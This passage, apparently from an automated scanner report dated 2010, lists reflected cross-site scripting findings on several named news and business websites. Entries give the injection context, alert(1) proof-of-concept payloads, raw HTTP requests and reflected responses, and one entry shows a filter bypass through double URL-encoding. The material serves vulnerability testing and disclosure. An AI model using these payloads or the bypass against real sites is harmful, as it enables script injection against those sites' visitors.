The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c75b"-alert(1)-"f1a7e06185b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/8c75b"-alert(1)-"f1a7e06185b HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:17:35 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 91754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/8c75b"-alert(1)-"f1a7e06185b"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73bdf<script>alert(1)</script>fe03bbb12b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article.php73bdf<script>alert(1)</script>fe03bbb12b7 HTTP/1.1 Host: www.breitbart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 13 Dec 2010 03:18:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 X-Server-Processing-Time: D=624 microseconds Content-Length: 418 Content-Type: text/html; charset=UTF-8 X-Cache: MISS from ch-sv-bb1.ha-hosting.com Connection: close
<HTML>
<HEAD>
<title> 404 Error Page</title>
</HEAD>
<BODY>
<p align="center">
<h1>Error 404</h1><br>Page Not Found
<p>
Sun Dec 12 2010 7:18:49 pm PST
<br> 174.121.222.18 tried to load www.breitbart.com/article.php73bdf<script>alert(1)</script>fe03bbb12b7 <br> ...[SNIP]...
1.36. http://www.breitbart.com/article.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.breitbart.com
Path:
/article.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d66e</script><script>alert(1)</script>5ce7f257000 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article.php?9d66e</script><script>alert(1)</script>5ce7f257000=1 HTTP/1.1 Host: www.breitbart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 13 Dec 2010 03:18:39 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Cache-Control: max-age=120 Expires: Mon, 13 Dec 2010 03:20:39 GMT X-Server-Processing-Time: D=4955 microseconds Content-Type: text/html; charset=UTF-8 X-Cache: MISS from ch-sv-bb2.ha-hosting.com Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/> <meta http-equiv="Content-type" co ...[SNIP]... <script> var idcomments_acct = 'f31a20c78c62120a6fedd29290aa2238', idcomments_post_id = "", idcomments_post_url = "http://www.breitbart.com/article.php?9d66e</script><script>alert(1)</script>5ce7f257000=1"; </script> ...[SNIP]...
1.37. http://www.breitbart.com/article.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.breitbart.com
Path:
/article.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f76af"><script>alert(1)</script>cdebc2c48ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article.php?f76af"><script>alert(1)</script>cdebc2c48ec=1 HTTP/1.1 Host: www.breitbart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Mon, 13 Dec 2010 03:18:34 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Cache-Control: max-age=120 Expires: Mon, 13 Dec 2010 03:20:34 GMT X-Server-Processing-Time: D=6032 microseconds Content-Type: text/html; charset=UTF-8 X-Cache: MISS from ch-sv-bb2.ha-hosting.com Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/> <meta http-equiv="Content-type" co ...[SNIP]... <a href="/print.php?f76af"><script>alert(1)</script>cdebc2c48ec=1" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4befb<script>alert(1)</script>4680da74e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /print.php4befb<script>alert(1)</script>4680da74e07 HTTP/1.1 Host: www.breitbart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 13 Dec 2010 03:18:38 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 X-Server-Processing-Time: D=687 microseconds Content-Length: 416 Content-Type: text/html; charset=UTF-8 X-Cache: MISS from ch-sv-bb2.ha-hosting.com Connection: close
<HTML>
<HEAD>
<title> 404 Error Page</title>
</HEAD>
<BODY>
<p align="center">
<h1>Error 404</h1><br>Page Not Found
<p>
Sun Dec 12 2010 7:18:38 pm PST
<br> 174.121.222.18 tried to load www.breitbart.com/print.php4befb<script>alert(1)</script>4680da74e07 <br> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e48f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3e7ea77ee4 was submitted in the REST URL parameter 2. This input was echoed as e48f4"><script>alert(1)</script>a3e7ea77ee4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/structured-cablinge48f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3e7ea77ee4/structured-cabling/more-fibre-cable-support-needed-in-africa-19899129/ HTTP/1.1 Host: www.comms-express.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:21:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=kad4rmdk0psje17d7fmldfbaf2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 21276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <a href="/news/structured-cablinge48f4"><script>alert(1)</script>a3e7ea77ee4/firms-advised-to-future-proof-their-network-cabling-systems-800200809/"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acfb0'-alert(1)-'f7bcc9ca40d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/it-businessacfb0'-alert(1)-'f7bcc9ca40d/21443/consumer-mobile-spending-to-outpace-fixed-line-says-analyst/ HTTP/1.1 Host: www.computerworlduk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 13 Dec 2010 03:23:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24711831;expires=Wed, 05-Dec-2040 03:23:06 GMT;path=/ Set-Cookie: CFTOKEN=7215bd5979cc1caa-DDC0C080-24E8-4E1E-79DEA360076FC202;expires=Wed, 05-Dec-2040 03:23:06 GMT;path=/ Set-Cookie: JSESSIONID=3a304b078403edb9a4485d5239a4a3375474;path=/ Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adfb8'-alert(1)-'efc88671618 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/it-business/21443/consumer-mobile-spending-to-outpace-fixed-line-says-analystadfb8'-alert(1)-'efc88671618/ HTTP/1.1 Host: www.computerworlduk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 13 Dec 2010 03:23:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24711873;expires=Wed, 05-Dec-2040 03:23:50 GMT;path=/ Set-Cookie: CFTOKEN=d32b90f012f7454-DDC16CAD-24E8-4E1E-799FB8302C6135FF;expires=Wed, 05-Dec-2040 03:23:50 GMT;path=/ Set-Cookie: JSESSIONID=3a30c2e1d79c7aaa83133f51135a314c4b70;path=/ Content-Type: text/html; charset=UTF-8
1.42. http://www.computerworlduk.com/news/it-business/21443/consumer-mobile-spending-to-outpace-fixed-line-says-analyst/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa1b4'-alert(1)-'db57b14bcba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/it-business/21443/consumer-mobile-spending-to-outpace-fixed-line-says-analyst/?aa1b4'-alert(1)-'db57b14bcba=1 HTTP/1.1 Host: www.computerworlduk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 13 Dec 2010 03:21:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24711765;expires=Wed, 05-Dec-2040 03:21:55 GMT;path=/ Set-Cookie: CFTOKEN=5daa2cae313a405a-DDBFADBC-24E8-4E1E-791EB7BB8B94BEAA;expires=Wed, 05-Dec-2040 03:21:55 GMT;path=/ Set-Cookie: JSESSIONID=3a30d21f5e760a6975cb791e623f6d6a183b;path=/ Content-Type: text/html; charset=UTF-8
1.43. http://www.dailyfinance.com/article/aggressive-pricing-will-drive-multiplay/1211282/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43a77"><script>alert(1)</script>2a83494c9ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/aggressive-pricing-will-drive-multiplay/1211282/?43a77"><script>alert(1)</script>2a83494c9ed=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/article/aggressive-pricing-will-drive-multiplay/1211282/?43a77"><script>alert(1)</script>2a83494c9ed=1" rel="nofollow"> ...[SNIP]...
1.44. http://www.dailyfinance.com/article/aggressive-pricing-will-drive-multiplay/1211282/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac8d4"-alert(1)-"cd842e8b99e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/aggressive-pricing-will-drive-multiplay/1211282/?ac8d4"-alert(1)-"cd842e8b99e=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = ' ...[SNIP]...
1.45. http://www.dailyfinance.com/article/manda-will-change-telecoms-competitive/1284614/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd3b3"-alert(1)-"7f270e46d91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/manda-will-change-telecoms-competitive/1284614/?cd3b3"-alert(1)-"7f270e46d91=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = ' ...[SNIP]...
1.46. http://www.dailyfinance.com/article/manda-will-change-telecoms-competitive/1284614/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 924e4"><script>alert(1)</script>ef9dbcaa03a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/manda-will-change-telecoms-competitive/1284614/?924e4"><script>alert(1)</script>ef9dbcaa03a=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fbc2"-alert(1)-"f3fe355a8d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/prepaid-mobile-to-expand-market-for/1178968/?5fbc2"-alert(1)-"f3fe355a8d6=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7231"><script>alert(1)</script>cbb2b2e8e68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/prepaid-mobile-to-expand-market-for/1178968/?f7231"><script>alert(1)</script>cbb2b2e8e68=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/article/prepaid-mobile-to-expand-market-for/1178968/?f7231"><script>alert(1)</script>cbb2b2e8e68=1" rel="nofollow"> ...[SNIP]...
1.49. http://www.dailyfinance.com/rtn/pr/malaysia-s-broadband-project-to-fuel-telecom-capex-and-revenue-surge-pyramid-finds/rfid365510475/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a95"><script>alert(1)</script>4ed2851d9e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rtn/pr/malaysia-s-broadband-project-to-fuel-telecom-capex-and-revenue-surge-pyramid-finds/rfid365510475/?53a95"><script>alert(1)</script>4ed2851d9e5=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/rtn/pr/malaysia-s-broadband-project-to-fuel-telecom-capex-and-revenue-surge-pyramid-finds/rfid365510475/?53a95"><script>alert(1)</script>4ed2851d9e5=1" rel="nofollow"> ...[SNIP]...
1.50. http://www.dailyfinance.com/rtn/pr/malaysia-s-broadband-project-to-fuel-telecom-capex-and-revenue-surge-pyramid-finds/rfid365510475/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1cc3"-alert(1)-"3705958503d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rtn/pr/malaysia-s-broadband-project-to-fuel-telecom-capex-and-revenue-surge-pyramid-finds/rfid365510475/?f1cc3"-alert(1)-"3705958503d=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into an HTML comment. The payload 6a6a8--><script>alert(1)</script>4a5db981751 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /feed/6a6a8--><script>alert(1)</script>4a5db981751 HTTP/1.1 Host: www.financetech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:22:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Mon, 13 Dec 2010 03:22:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=AVFFYUHSXSBIRQE1GHPSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 23355
1.52. http://www.informador.com.mx/economia/2010/194908/6/seis-de-cada-10-pymes-recurren-a-la-publicidad-en-linea.htm [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7338"><script>alert(1)</script>6cb755c1d40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /economia/2010/194908/6/seis-de-cada-10-pymes-recurren-a-la-publicidad-en-linea.htm?b7338"><script>alert(1)</script>6cb755c1d40=1 HTTP/1.1 Host: www.informador.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:22:48 GMT Server: Apache Set-Cookie: PHPSESSID=fv00nl7l51jbsbp7sl9vaq7bu2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41373
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="es"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <titl ...[SNIP]... <div class="js-kit-comments" permalink="/economia/2010/194908/6/seis-de-cada-10-pymes-recurren-a-la-publicidad-en-linea.htm?b7338"><script>alert(1)</script>6cb755c1d40=1" uniq="194908" editable="yes"> ...[SNIP]...
1.53. http://www.informador.com.mx/economia/2010/212976/6/registra-mexico-retroceso-en-penetracion-de-telefonia-fija.htm [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd25"><script>alert(1)</script>ba64116fc8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /economia/2010/212976/6/registra-mexico-retroceso-en-penetracion-de-telefonia-fija.htm?9cd25"><script>alert(1)</script>ba64116fc8e=1 HTTP/1.1 Host: www.informador.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:22:45 GMT Server: Apache Set-Cookie: PHPSESSID=jvcpb2epba344gftiltt5206i4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40732
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="es"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <titl ...[SNIP]... <div class="js-kit-comments" permalink="/economia/2010/212976/6/registra-mexico-retroceso-en-penetracion-de-telefonia-fija.htm?9cd25"><script>alert(1)</script>ba64116fc8e=1" uniq="212976" editable="yes"> ...[SNIP]...
1.54. http://www.informador.com.mx/economia/2010/213738/6/preven-liderazgo-de-televisa-en-contenidos-moviles.htm [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e033"><script>alert(1)</script>9c79216f540 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /economia/2010/213738/6/preven-liderazgo-de-televisa-en-contenidos-moviles.htm?4e033"><script>alert(1)</script>9c79216f540=1 HTTP/1.1 Host: www.informador.com.mx Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 13 Dec 2010 03:22:44 GMT Server: Apache Set-Cookie: PHPSESSID=9r796mb094n51497o6ku7pfsh5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39893
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="es"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <titl ...[SNIP]... <div class="js-kit-comments" permalink="/economia/2010/213738/6/preven-liderazgo-de-televisa-en-contenidos-moviles.htm?4e033"><script>alert(1)</script>9c79216f540=1" uniq="213738" editable="yes"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7e12'-alert(1)-'b52c48e98e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newse7e12'-alert(1)-'b52c48e98e2/infrastructure/ethernet/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:23:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Mon, 13 Dec 2010 03:23:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=OK2NAWJREVKMZQE1GHPCKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32156
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newse7e12'-alert(1)-'b52c48e98e2/infrastructure/ethernet/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=147254684;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b60"><script>alert(1)</script>31a60ca3d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsa1b60"><script>alert(1)</script>31a60ca3d79/infrastructure/ethernet/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 13 Dec 2010 03:23:27 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Mon, 13 Dec 2010 03:23:27 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=B0ET3VANLB55JQE1GHPCKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32206
